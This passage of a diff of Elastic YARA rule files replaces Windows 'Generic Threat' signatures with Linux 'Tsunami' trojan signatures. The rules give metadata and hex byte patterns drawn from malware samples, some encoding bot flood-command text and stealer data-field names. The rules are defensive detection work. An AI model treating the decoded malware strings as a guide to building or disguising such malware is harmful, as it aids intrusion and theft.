"e22b8b208ff104e2843d897c425467f2f0ec0c586c4db578da90aeaef0209e1d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Tsunami.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a4ac275275e7be694a200fe6c5c5746256398c109cf54f45220637fe5d9e26ba" + logic_hash = "979d2ae62efca0f719ed1db2ff832dc9a0aa0347dcd50ccede29ec35cba6d296" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "3bbb00aa18086ac804f6ddf99a50821744a420f46b6361841b8bcd2872e597f1" - severity = 50 + fingerprint = "8fc61c0754d1a8b44cefaf2dbd937ffa0bb177d98b071347d2f9022181555b7a" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 6F 01 00 06 6F 25 00 00 0A 02 7B 03 00 00 04 73 8D 01 00 06 6F 25 00 00 0A 02 7B 03 00 00 04 73 92 01 00 06 6F 25 00 00 0A 02 7B 03 00 00 04 73 9A 01 00 06 6F 25 00 00 0A 02 7B 03 00 00 04 73 } + $a = { 04 02 01 20 03 20 02 C9 07 40 4E 00 60 01 C0 04 17 B6 92 07 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_9C7D2333 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Tsunami_30C039E2 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Tsunami (Linux.Trojan.Tsunami)" author = "Elastic Security" - id = "9c7d2333-f2c4-4d90-95ce-d817da5cb2a3" - date = "2024-01-17" - modified = "2024-02-08" + id = "30c039e2-1c51-4309-9165-e3f2ce79cd6e" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1484-L1502" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "85219f1402c88ab1e69aa99fe4bed75b2ad1918f4e95c448cdc6a4b9d2f9a5d4" - logic_hash = "561290ebf3ca2a01914f514d63121be930e7a8c06cfc90ff4b8f0c7cef3408fe" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Tsunami.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b494ca3b7bae2ab9a5197b81e928baae5b8eac77dfdc7fe1223fee8f27024772" + logic_hash = "a9dbfede68a3209b403aa40dbc5b69326c3e1c14259ed6bc6351f0f9412cfce2" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "3f003cc34b797887b5bbfeb729441d7fdb537d4516f13b215e1f6eceb5a8afaf" - severity = 50 + fingerprint = "4c97fed719ecfc68e7d67268f19aff545447b4447a69814470fe676d4178c0ed" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 55 8B EC 81 EC 64 09 00 00 57 C6 85 00 F8 FF FF 00 B9 FF 00 00 00 33 C0 8D BD 01 F8 FF FF F3 AB 66 AB AA C6 85 00 FC FF FF 00 B9 FF 00 00 00 33 C0 8D BD 01 FC FF FF F3 AB 66 AB AA C7 85 AC F6 } + $a = { 45 E0 0F B6 00 84 C0 74 1F 48 8B 45 E0 48 8D 50 01 48 8B 45 E8 48 83 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_747B58Af : FILE MEMORY +rule ELASTIC_Linux_Trojan_Tsunami_C94Eec37 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Tsunami (Linux.Trojan.Tsunami)" author = "Elastic Security" - id = "747b58af-6edb-42f2-8a1b-e462399ef61e" - date = "2024-01-17" - modified = "2024-02-08" + id = "c94eec37-8ae1-48d2-8c75-36f2582a2742" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1504-L1524" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "ee28e93412c59d63155fd79bc99979a5664c48dcb3c77e121d17fa985fcb0ebe" - logic_hash = "fd6b36ca50c1017035474b491f716bfb0d53b181fce4b5478a57a1d1a6ddc3e7" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Tsunami.yar#L41-L59" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "294fcdd57fc0a53e2d63b620e85fa65c00942db2163921719d052d341aa2dc30" + logic_hash = "39a49e1661ac2ca6a43a56b0bd136976f6d506c0779d862a43ba2c25d6947fee" score = 75 - quality = 69 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "79faab4fda6609b2c95d24de92a3a417d2f5e58f3f83c856fa9f32e80bed6f37" - severity = 50 + fingerprint = "c692073af446327f739e1c81f4e3b56d812c00c556e882fe77bfdff522082db4" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 5C 43 3D 5D 78 48 73 66 40 22 33 2D 34 } - $a2 = { 79 5A 4E 51 61 4A 21 43 43 56 31 37 74 6B } - $a3 = { 66 72 7A 64 48 49 2D 4E 3A 4D 23 43 } + $a = { 05 88 10 8B 45 E4 0F B6 10 83 E2 0F 83 CA 40 88 10 8B 45 E4 C6 40 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_C3C4E847 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Tsunami_F806D5D9 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Tsunami (Linux.Trojan.Tsunami)" author = "Elastic Security" - id = "c3c4e847-ef6f-430d-9778-d48326fb4eb0" - date = "2024-01-17" - modified = "2024-02-08" + id = "f806d5d9-0bf6-4da7-80fb-b1612f2ddd5b" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1526-L1544" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "86b37f0b2d9d7a810b5739776b4104f1ded3a1228c4ec2d104d26d8eb26aa7ba" - logic_hash = "fa147abf7aa872f409e7684c4c60485fc58f57543062573526e56ff9866f8dfe" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Tsunami.yar#L61-L79" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "5259495788f730a2a3bad7478c1873c8a6296506a778f18bc68e39ce48b979da" + logic_hash = "86336f662e3abcf2fe7635155782c549fc9eef514356bf78bfbc3b65192e2d90" score = 75 quality = 73 tags = "FILE, MEMORY" - fingerprint = "017a8ec014fed493018cff128b973bb648dbb9a0d1bede313d237651d3f6531a" - severity = 50 + fingerprint = "f4f838fcd1fe7f85e435225f3e34b77b848246b2b9618b47125a611c8d282347" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 2E 3F 41 56 3F 24 5F 52 65 66 5F 63 6F 75 6E 74 40 55 41 70 69 44 61 74 61 40 40 40 73 74 64 40 40 } + $a = { 41 54 45 48 54 54 50 20 3C 68 6F 73 74 3E 20 3C 73 72 63 3A } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_6542Ebda : FILE MEMORY +rule ELASTIC_Linux_Trojan_Tsunami_0Fa3A6E9 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Tsunami (Linux.Trojan.Tsunami)" author = "Elastic Security" - id = "6542ebda-c91e-449e-88c4-244fba69a4b2" - date = "2024-01-17" - modified = "2024-02-08" + id = "0fa3a6e9-89f3-4bc8-8dc1-e9ccbeeb836d" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1546-L1564" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "2073e51c7db7040c6046e36585873a0addc2bcddeb6e944b46f96c607dd83595" - logic_hash = "30263341bf51a001503dfda9be5771d401bc5b5423682c29a6d4ebc457415d3e" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Tsunami.yar#L81-L99" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "40a15a186373a062bfb476b37a73c61e1ba84e5fa57282a7f9ec0481860f372a" + logic_hash = "970062e909ffe5356b750605f2c44a6e893949bc5bc71be3ea98b16e51629d4d" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "a4ceaf0bf2e8dc3efbc6e41e608816385f40c04984659b0ec15f109b7a6bf20a" - severity = 50 + fingerprint = "fed796c5275e2e91c75dcdbf73d0c0ab37591115989312c6f6c5adcd138bc91f" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 55 8B EC 53 56 57 8B F9 85 D2 74 18 0F B7 02 8D 5A 02 0F B7 72 02 8B 4A 04 3B C7 74 0E 83 C2 08 03 D1 75 E8 33 C0 5F 5E 5B 5D C3 B8 78 03 00 00 66 3B F0 74 EF 8B 45 08 89 18 8D 41 06 EB E7 8D } + $a = { EC 8B 55 EC C1 FA 10 0F B7 45 EC 01 C2 89 55 EC 8B 45 EC C1 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_1417511B : FILE MEMORY +rule ELASTIC_Linux_Trojan_Tsunami_36A98405 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Tsunami (Linux.Trojan.Tsunami)" author = "Elastic Security" - id = "1417511b-2b31-47a8-8465-b6a174174863" - date = "2024-01-17" - modified = "2024-02-08" + id = "36a98405-8b95-49cb-98c5-df4a445d9d39" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1566-L1584" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "2fc9bd91753ff3334ef7f9861dc1ae79cf5915d79fa50f7104cbb3262b7037da" - logic_hash = "e6b53082fa447ac3cf56784771aca742696922e6f740a24d014e04250dc5020c" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Tsunami.yar#L101-L119" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a57de6cd3468f55b4bfded5f1eed610fdb2cbffbb584660ae000c20663d5b304" + logic_hash = "a32d324d1865a7796faefbc2f209e6043008a696929fe7837afbbc770e6f4c74" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "4be19360fccf794ca2e53c4f47cd1becf476becf9eafeab430bdb3c64581613c" - severity = 50 + fingerprint = "c76ca23eece4c2d4ec6656ffb40d6e6ea7777d8a904f4775913fe60ebd606cd6" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 83 EC 20 8B 45 08 89 45 F4 8B 4D F4 8B 55 08 03 51 3C 89 55 F0 B8 08 00 00 00 6B C8 00 8B 55 F0 8B 45 08 03 44 0A 78 89 45 F8 8B 4D F8 8B 55 08 03 51 20 89 55 EC 8B 45 F8 8B 4D 08 03 } + $a = { 05 88 85 50 FF FF FF 0F B6 85 50 FF FF FF 83 E0 0F 83 C8 40 88 85 50 FF } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_7526F106 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Tsunami_0C6686B8 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Tsunami (Linux.Trojan.Tsunami)" author = "Elastic Security" - id = "7526f106-018f-41b9-a1bf-15f7d9f2188e" - date = "2024-01-17" - modified = "2024-02-08" + id = "0c6686b8-8880-4a2c-ba70-9a9840a618b0" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1586-L1605" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "5a297c446c27a8d851c444b6b32a346a7f9f5b5e783564742d39e90cd583e0f0" - logic_hash = "a0f9eb760be05196f0c5c3e3bf250929b48341a58a11c24722978fa19c4a9f57" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Tsunami.yar#L121-L139" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "409c55110d392aed1a9ec98a6598fb8da86ab415534c8754aa48e3949e7c4b62" + logic_hash = "731bb3f9957e8777040c0b7b316a818f4ee1ca9a113fb9eed24ee61bfc71e11d" score = 75 - quality = 71 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "5f5fc4152aae94b9c3bc0380dbcb093289c840a29b629b1d76a09c672daa9586" - severity = 50 + fingerprint = "7bab1c0cf4fb79c50369f991373178ef3b5d3f7afd765dac06e86ac0c27e0c83" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 50 72 6F 6A 65 63 74 31 2E 75 45 78 57 61 74 63 68 } - $a2 = { 6C 49 45 4F 62 6A 65 63 74 5F 44 6F 63 75 6D 65 6E 74 43 6F 6D 70 6C 65 74 65 } + $a = { 45 F8 31 C0 48 8B 45 C8 0F B7 40 02 66 89 45 D0 48 8B 45 C8 8B } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_Cbe3313A : FILE MEMORY +rule ELASTIC_Linux_Trojan_Tsunami_9Ce5B69F : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Tsunami (Linux.Trojan.Tsunami)" author = "Elastic Security" - id = "cbe3313a-ab8f-4bf1-8f62-b5494c6e7034" - date = "2024-01-17" - modified = "2024-02-08" + id = "9ce5b69f-4938-4576-89da-8dcd492708ed" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1607-L1625" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "1ca2a28c851070b9bfe1f7dd655f2ea10ececef49276c998a1d2a1b48f84cef3" - logic_hash = "41a731cefe0c8ee95f1db598b68a8860ef7ff06137ce94d0dd0b5c60c4240e85" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Tsunami.yar#L141-L159" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ad63fbd15b7de4da0db1b38609b7481253c100e3028c19831a5d5c1926351829" + logic_hash = "b9756eb99e59ba3a9a616b391bcf26bda26a6ac0de115460f9ba52129f590764" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "dc92cec72728b1df78d79dc5a34ea56ee0b8c8199652c1039288c46859799376" - severity = 50 + fingerprint = "90fece6c2950467d78c8a9f1d72054adf854f19cdb33e71db0234a7b0aebef47" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 83 EC 08 68 E6 25 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 2C 53 56 57 89 65 F8 C7 45 FC D0 25 40 00 A1 94 B1 41 00 33 F6 3B C6 89 75 EC 89 75 E8 89 75 E4 0F 8E E7 00 00 } + $a = { F4 8B 54 85 B4 8B 45 E4 8D 04 02 C6 00 00 FF 45 F4 8B 45 E4 01 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_779Cf969 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Tsunami_55A80Ab6 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Tsunami (Linux.Trojan.Tsunami)" author = "Elastic Security" - id = "779cf969-d1a0-4280-94cb-c7f62d33482c" - date = "2024-01-17" - modified = "2024-02-08" + id = "55a80ab6-3de4-48e1-a9de-28dc3edaa104" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1627-L1645" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "ef281230c248442c804f1930caba48f0ae6cef110665020139f826ab99bbf274" - logic_hash = "ad0f2d78386abf4c6dc6b5a4a88b4dcf8e5bf8086b08bac91e5e00be9936e908" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Tsunami.yar#L161-L179" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "5259495788f730a2a3bad7478c1873c8a6296506a778f18bc68e39ce48b979da" + logic_hash = "1fc29f98e9ea2a5b67d0a88f37813a5e62b5f1d2a26aee74f90e9ead445dc713" score = 75 quality = 73 tags = "FILE, MEMORY" - fingerprint = "7e089462cc02e2c9861018df71bf5dda6a3a982d3d98b252d44387c937526be4" - severity = 50 + fingerprint = "2fe3a9e1115d8c2269fe090c57ee3d5b2cd52b4ba1d020cec0135e2f8bbcb50e" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 3E 43 6F 70 79 72 69 67 68 74 20 28 63 29 20 50 79 74 68 6F 6E 20 53 6F 66 74 77 61 72 65 20 46 6F 75 6E 64 61 74 69 6F 6E 2E 20 41 6C 6C 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2E } + $a = { 74 68 65 20 63 75 72 72 65 6E 74 20 73 70 6F 6F 66 69 6E 67 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_D568682A : FILE MEMORY +rule ELASTIC_Linux_Trojan_Tsunami_E98B83Ee : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Tsunami (Linux.Trojan.Tsunami)" author = "Elastic Security" - id = "d568682a-94d2-41e7-88db-f6d6499cbdb2" - date = "2024-01-17" - modified = "2024-02-08" + id = "e98b83ee-0533-481a-9947-538bd2f99b6b" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1647-L1665" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0d98bc52259e0625ec2f24078cf4ae3233e5be0ade8f97a80ca590a0f1418582" - logic_hash = "97e172502037c7a5d66327fcc4a237e5548694fc7d73a535838ad56367f15d76" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Tsunami.yar#L181-L199" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "cf1ca1d824c8687e87a5b0275a0e39fa101442b4bbf470859ddda9982f9b3417" + logic_hash = "8b16c0fee991ee2143a20998097066a90b1f20060bac7b42e5c3188adcdc7907" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "2195cf67cdedfe7531591f65127ef800062d88157126393d0a767837a9023632" - severity = 50 + fingerprint = "b5440c783bc18e23f27a3131ccce4629f8d0ceea031971cbcdb69370ab52e935" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 28 00 00 0A 28 22 00 00 0A 80 19 00 00 04 28 53 00 00 06 28 2D 00 00 0A 28 5D 00 00 06 16 80 1D 00 00 04 7E 13 00 00 04 7E 15 00 00 04 16 7E 15 00 00 04 8E B7 16 14 FE 06 5B 00 00 06 73 79 00 } + $a = { 45 FE 00 00 EB 16 48 8B 55 D8 0F B7 02 0F B7 C0 01 45 E0 48 83 45 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_Ccb6A7A2 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Tsunami_8A11F9Be : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Tsunami (Linux.Trojan.Tsunami)" author = "Elastic Security" - id = "ccb6a7a2-6003-4ba0-aefc-3605d085486d" - date = "2024-01-17" - modified = "2024-02-08" + id = "8a11f9be-dc85-4695-9f38-80ca0304780e" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1667-L1686" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "60503212db3f27a4d68bbfc94048ffede04ad37c78a19c4fe428b50f27af7a0d" - logic_hash = "312265bbc4330a463bbe7478c70233f5df3353bda3c450562f2414f3675ba91e" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Tsunami.yar#L201-L219" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1f773d0e00d40eecde9e3ab80438698923a2620036c2fc33315ef95229e98571" + logic_hash = "f80dcb3579a76da787e9bb2bfb02ef86e464aec1bea405f02642b8c8902c7663" score = 75 - quality = 71 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "a73b0e067fce2e87c08359b4bb2ba947cc276ff0a07ff9e04cabde529e264192" - severity = 50 + fingerprint = "91e2572a3bb8583e20042578e95e1746501c6a71ef7635af2c982a05b18d7c6d" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 40 52 61 6E 67 65 3A 62 79 74 65 73 3D 30 2D } - $a2 = { 46 49 77 41 36 4B 58 49 75 4E 66 4B 71 49 70 4B 30 4D 57 4D 74 49 38 4B 67 4D 68 49 39 4B 30 4D 53 49 6A 4B 66 4D 73 49 76 4B 75 4D 64 49 70 4B 30 4D 73 49 66 4B 68 4D 6F 49 69 43 6F 4D 6C 49 71 4B } + $a = { 3E 20 3C 70 6F 72 74 3E 20 3C 72 65 66 6C 65 63 74 69 6F 6E 20 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_D62F1D01 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Tsunami_2462067E : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Tsunami (Linux.Trojan.Tsunami)" author = "Elastic Security" - id = "d62f1d01-4e24-4a93-85ad-3a3886d5de2f" - date = "2024-01-17" - modified = "2024-02-08" + id = "2462067e-06cf-409c-8184-86bd7a772690" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1688-L1706" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "380892397b86f47ec5e6ed1845317bf3fd9c00d01f516cedfe032c0549eef239" - logic_hash = "fd65eb56f3a48c37f83d3544c039d29c231cac1e2f8f07d176d709432a75a4c3" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Tsunami.yar#L221-L239" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "3847f1c7c15ce771613079419de3d5e8adc07208e1fefa23f7dd416b532853a1" + logic_hash = "cf6c0703f9108f8193e0a9c18ba3d76263527a13fe44e194fa464d399512ae05" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "f7736c8920092452ca795583a258ad8b1ffd79116bddde3cff5d06b3ddab31b6" - severity = 50 + fingerprint = "f84d62ad2d6f907a47ea9ff565619648564b7003003dc8f20e28a582a8331e6b" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 55 8B EC 51 53 56 8B 75 08 33 C0 57 8B FE AB AB AB 8B 7D 0C 8B 45 10 03 C7 89 45 FC 3B F8 73 3F 0F B7 1F 53 E8 01 46 00 00 59 66 3B C3 75 28 83 46 04 02 83 FB 0A 75 15 6A 0D 5B 53 E8 E9 45 00 } + $a = { 8B 45 F4 8B 40 0C 89 C1 8B 45 F4 8B 40 10 8B 10 8D 45 E4 89 C7 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_2Bb6F41D : FILE MEMORY +rule ELASTIC_Linux_Trojan_Tsunami_0A028640 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Tsunami (Linux.Trojan.Tsunami)" author = "Elastic Security" - id = "2bb6f41d-41bb-4257-84ef-9026fcc0ebec" - date = "2024-01-17" - modified = "2024-02-08" + id = "0a028640-581f-4183-9313-e36c5812e217" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1708-L1728" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "afa060352346dda4807dffbcac75bf07e8800d87ff72971b65e9805fabef39c0" - logic_hash = "7c4e62b69880eb8a901d7e94b7539786e8ac58808df07cb1cbe9ff45efce518e" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Tsunami.yar#L241-L259" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e36081f0dbd6d523c9378cdd312e117642b0359b545b29a61d8f9027d8c0f2f0" + logic_hash = "663f110c7214498466759b66a83ff1844f5bf45ce706fa8ad0e8b205cc9c8f72" score = 75 - quality = 69 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "d9062e792a0b8f92a03c0fdadd4dd651a0072faa3dd439bb31399a0c75a78c21" - severity = 50 + fingerprint = "1b296e8baffbe3e0e49aee23632afbfab75147f31561d73eb0c82f909c5ec718" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 67 65 74 5F 73 45 78 70 59 65 61 72 } - $a2 = { 73 65 74 5F 73 45 78 70 59 65 61 72 } - $a3 = { 42 72 6F 77 73 65 72 50 61 74 68 54 6F 41 70 70 4E 61 6D 65 } + $a = { 10 85 C0 74 2D 8B 45 0C 0F B6 00 84 C0 74 19 8B 45 0C 83 C0 01 83 } condition: all of them } -rule 